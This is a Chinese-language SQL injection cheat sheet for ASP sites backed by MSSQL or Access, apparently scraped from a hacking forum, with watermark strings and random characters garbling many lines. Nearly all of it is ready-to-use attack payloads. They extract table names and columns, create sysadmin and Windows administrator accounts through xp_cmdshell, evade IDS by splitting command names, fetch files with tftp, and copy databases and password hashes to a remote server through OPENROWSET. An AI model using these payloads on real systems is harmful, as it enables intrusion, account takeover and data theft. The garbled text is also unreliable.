Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin( S4 j# N& }8 D" l! Q) l
(union语句到处风靡啊,access也好用
暴库特殊技巧::%5c=’/’ 或者把/和/ 修改%5提交
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)T00LS - 低调求发展2 v, }# _ |# B; J
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 得到表名+ v& i! C! r8 a9 ~8 P/ |7 p
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in(’Address’))6 C- T5 }' g& x
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’ and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段3 }7 x# i7 e* L, G( g2 ?5 D- Y" ~
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1www.t00ls.net% x b1 j, }3 U' [; G7 C+ _3 s. E* N. K
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=’HKEY_LOCAL_MACHINE’, @key=’SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/’, @value_name=’/’, values=@test OUTPUT insert into paths(path) values(@test)www.t00ls.net5 `: {. }9 c/ S* t) |* L
http://61.131.96.39/PageShow.asp?TianName=政 策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master; declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
得到了web路径d:/xxxx,接下来:) A& j3 G8 {7 S3 V0 Y0 b( G
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--www.t00ls.net- n! e2 @9 v' P$ G, X7 [ e, {
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--3 g; z6 G1 s$ R9 r( ~
传统的存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell ’dir’
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell ’net user admin 123456 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--6 b* a& E R6 G5 G+ K1 e/ z" L
;exec master.dbo.xp_cmdshell ’net localgroup administrators admin /add’;--T00LS - 低调求发展! ^- z0 l! U) e
exec master..xp_servicecontrol ’start’, ’schedule’
exec master..xp_servicecontrol ’start’, ’server’9 L' b ]# {/ c- r' @" ^/ a
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WINNT/system32/cmd.exe /c net user admin 123456 /add’
;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:/WINNT/system32/cmd.exe /c net localgroup administrators admin /add’4 U& K7 C+ K- o* O1 ]0 u$ [9 z* r
http://localhost/show.asp?id=1'; exec master..xp_cmdshell ’tftp -i youip get file.exe’- _* y4 W( N' Q2 B3 d3 x+ ^
declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ’dir c:/’% l' D: T& [' k/ y
declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ’dir c:/’ f: Z5 ~* K6 z+ K% e: A# K
;declare @a;set @a=db_name();backup database @a to disk=’你的IP你的共享目录bak.dat’www.t00ls.net- G( r0 T; a: _# Y, t, L6 x% N
如果被限制则可以。T00LS - 低调求发展1 _" w- x+ Q- k* I* R
select * from openrowset(’sqloledb’,’server’;’sa’;’’,’select ’’OK!’’ exec master.dbo.sp_addlogin hax’)
传统查询构造:
select * FROM news where id=... AND topic=... AND ....." O0 c3 R' V- b k
admin’and 1=(select count(*) from [user] where username=’victim’ and right(left(userpass,01),1)=’1’) and userpass <>’T00LS - 低调求发展 e; n1 s" \$ a) @
select 123;--
;use master;--5 g7 p/ v2 Y {# U4 s& Q- L
:a’ or name like ’fff%’;-- 显示有一个叫ffff的用户哈。T00LS - 低调求发展! p; d V$ ]# o
’and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and status>0) where name=’ffff’;--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。, t4 O5 K M* R/ U$ U* s
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID. P3 j, O8 g3 H% ^ j: V
ffff’;update [users] set email=(select top 1 id from sysobjects where xtype=’u’ and name=’ad’) where name=’ffff’;--T00LS - 低调求发展+ W/ x" b/ `, V6 n4 `
象下面这样就可以得到第二个表的名字了: f: f9 b2 o: V3 o. ]/ _9 M
ffff’;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and id>581577110) where name=’ffff’;--
ffff’;update [users] set email=(select top 1 count(id) from password) where name=’ffff’;--0 B! K4 a: R/ |5 a% v' m
ffff’;update [users] set email=(select top 1 pwd from password where id=2) where name=’ffff’;--
ffff’;update [users] set email=(select top 1 name from password where id=2) where name=’ffff’;--
exec master..xp_servicecontrol ’start’, ’schedule’( L( B* `" n' }8 J3 k# y+ W
exec master..xp_servicecontrol ’start’, ’server’www.t00ls.net* [0 X" D% s( }7 I/ [7 X
sp_addextendedproc ’xp_webserver’, ’c:/temp/xp_foo.dll’
扩展存储就可以通过一般的方法调用:+ E' N1 G& ?, M
exec xp_webserver4 e0 p' ^+ |. r% C
一旦这个扩展存储执行过,可以这样删除它:% a j& R9 q! L ?# O6 [
sp_dropextendedproc ’xp_webserver’! r, P k( b# p3 a2 ]2 ?
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-T00LS - 低调求发展' q3 N7 N# J }+ j3 v
insert into users values( 667,123,123,0xffff)-
insert into users values ( 123, ’admin’’--’, ’password’, 0xffff)-
;and user>0+ f4 l6 u6 }, q1 ]% v& r7 K
;;and (select count(*) from sysobjects)>0
;;and (select count(*) from mysysobjects)>0 //为access数据库, `- l" G% w% g8 n
-----------------------------------------------------------通常注射的一些介绍:+ j( z# }3 B- D X8 K
A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:- O3 z: |" Y2 U# X P4 }
select * from 表名 where 字段=49" c! @) a! O$ F+ T
注入的参数为ID=49 And [查询条件],即是生成语句:
select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
select * from 表名 where 字段=’连续剧’" L, T$ v; G& w! C0 l( ]
注入的参数为Class=连续剧’ and [查询条件] and ’’=’ ,即是生成语句:
select * from 表名 where 字段=’连续剧’ and [查询条件] and ’’=’’
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
select * from 表名 where 字段like ’%关键字%’% j4 q% d' N: C( ^0 N. j3 U
注入的参数为keyword=’ and [查询条件] and ’%25’=’, 即是生成语句:/ o6 v+ A& F/ S
select * from 表名 where字段like ’%’ and [查询条件] and ’%’=’%’
;;and (select Top 1 name from sysobjects where xtype=’U’ and status>0)>08 H6 t: y0 t& O% t) k1 B) k
sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。www.t00ls.net% b, H! S V, Q. ^- Y/ [% V
;;and (select Top 1 col_name(object_id(’表名’),1) from sysobjects)>0
从⑤拿到表名后,用object_id(’表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。
post.htm内容:主要是方便输入。T00LS - 低调求发展) B7 N3 t& o1 X) z6 B7 F* F8 Y V
枚举出他的数据表名:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--
这是将第一个表名更新到aaa的字段处。4 |: X9 D! X8 B8 j. A+ n
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--6 N0 y( _; B _! x
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,^^^^^^一个个的读出,直到没有为止。2 [8 [6 j3 G$ ]
读字段是这样:
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--: l& C; U) Y: O. S7 n" G1 l E$ A
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名4 y3 e+ Z3 z. b* O# }" y; a+ a
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--3 s( I- R; m# [) B
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名" ?' X& `! k) [( u9 W0 g, u4 O8 `
--------------------------------高级技巧:
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]% m- J4 v. v6 M) D. }6 _" [
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>’你得到的表名’ 查出一个加一个]) [ where 条件]6 o+ L& V) ?8 f7 k- ?: d; H
select top 1 name from sysobjects where xtype=u and status>0 and name not in(’table1’,’table2’,…)www.t00ls.net5 l8 b1 e& F/ }! z. q
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] a! J6 A q8 b+ b2 E
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id(’要查询的数据表名’),字段列如:1) [ where 条件]2 H% \5 }/ D* X1 e8 U
绕过IDS的检测[使用变量]
declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ’dir c:/’
declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ’dir c:/’
1、 开启远程数据库
基本语法- \) p/ F) A" f( d" m* O
select * from OPENROWSET(’SQLOLEDB’, ’server=servername;uid=sa;pwd=apachy_123’, ’select * from table1’ )5 t: z" w+ D+ ?
参数: (1) OLEDB Provider name8 O: D$ a K- B5 Y" F, Q8 Y
2、 其中连接字符串参数可以是任何和端口用来连接,比如
select * from OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table’3 H9 A: U; X0 }
要复制目标主机的整个数据库,首先要在目标主机上和自己机器上的数据库建立连接(如何在目标主机上建立远程连接,刚才已经讲了),之后insert所有远程表到本地表。# j" Z; u. q8 U0 W
基本语法:. y) c6 A* O/ E5 [
insert into OPENROWSET(’SQLOLEDB’, ’server=servername;uid=sa;pwd=apachy_123’, ’select * from table1’) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table1’) select * from table2
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=f19ht;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysdatabases’)$ ~; r% Y' a* P$ }! Z O, ?
select * from master.dbo.sysdatabases2 r5 {; D b7 }- ^' O4 ?
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=f19ht;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysobjects’)
select * from user_database.dbo.sysobjects
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _syscolumns’)T00LS - 低调求发展8 n5 y J! [: L
select * from user_database.dbo.syscolumns0 U& n$ R+ W8 L" w7 k
之后,便可以从本地数据库中看到目标主机的库结构,这已经易如反掌,不多讲,复制数据库:
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table1’) select * from database..table1
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table2’) select * from database..table2www.t00ls.net/ ] A- e i4 @) ]9 ]
......
3、 复制哈西表(HASH)
这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysxlogins’) select * from database.dbo.sysxlogins; Y$ P+ Z% C* s3 C- p% N3 s9 i& P
得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。) E. |" r, u0 K- } @3 F" I
遍历目录的方法:/ q B5 I6 n8 @' y
先创建一个临时表:temp
5’;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--0 p% q4 w* i7 ?
5’;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器www.t00ls.net3 _* I. y' d7 m: F
5’;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表T00LS - 低调求发展; r T: V9 n* H0 b8 G7 {$ ?: }& C
5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树结构,并寸入temp表中
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看某个文件的内容% U' t2 s: E2 F% p: e$ c
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:/’;--
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:/ *.asp /s/a’;--
5’;insert into temp(id) exec master.dbo.xp_cmdshell ’cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc’
5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- (xp_dirtree适用权限PUBLIC)www.t00ls.net6 a# Z: v' D. g5 P/ F
写入表:T00LS - 低调求发展- Y! X$ N9 v# w* ?* e
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--# _3 K ~, o7 b" m5 P
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--- v& H) F0 [9 i5 }
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--0 b1 E1 S$ Y# f6 D8 o
语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--T00LS - 低调求发展6 q! N+ G- N8 } v
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--T00LS - 低调求发展" m. j. `+ |! B: D
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--T00LS - 低调求发展3 e! R6 o+ D+ X
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER(’db_owner’));--8 b( H+ ^; `- d0 {" x1 y* _
把路径写到表中去:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’c:/’-. O5 v/ v7 u" V6 r. V; A, e0 ]
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-T00LS - 低调求发展, o3 b, l t( z: G% \; R- t/ \+ o
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in(’@Inetpub’))-3 x/ J) j6 D# L! m
语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’e:/web’--4 \# _& s7 C3 B& J
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-5 m8 W/ v1 V% G# ?$ D
把数据库备份到网页目录:下载9 V' X- g% ]) K( ?: [# Y& S. u$ W
http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk=’e:/web/down.bak’;--" ^* o3 b5 L+ }5 |3 e$ L
and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id(’USER_LOGIN’),1)%20from%20sysobjects) 参看相关表。www.t00ls.net5 \; m- \% \; \2 e H
and 1=(select%20user_id%20from%20USER_LOGIN)+ N( o% R0 a- w3 F6 w8 P
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)T00LS - 低调求发展* y: I) u. W6 _% a: m( N
如果可以通过连接符注释掉后面的验证,那么就更有意思了,来看我们能作什么:8 g! d s/ c; N
a、在用户名位置输入【admin’;exec master.dbo.sp_addlogin Cool;--】,添加一个sql用户* ^7 \( t- X3 @( c
b、在用户名位置输入【admin’;exec master.dbo.sp_password null,123456,Cool;--】,给Cool设置密码为123456www.t00ls.net. k. c/ r1 ^7 A! D! B: v
c、在用户名位置输入【admin’;exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】,给Cool赋予System Administrator权限
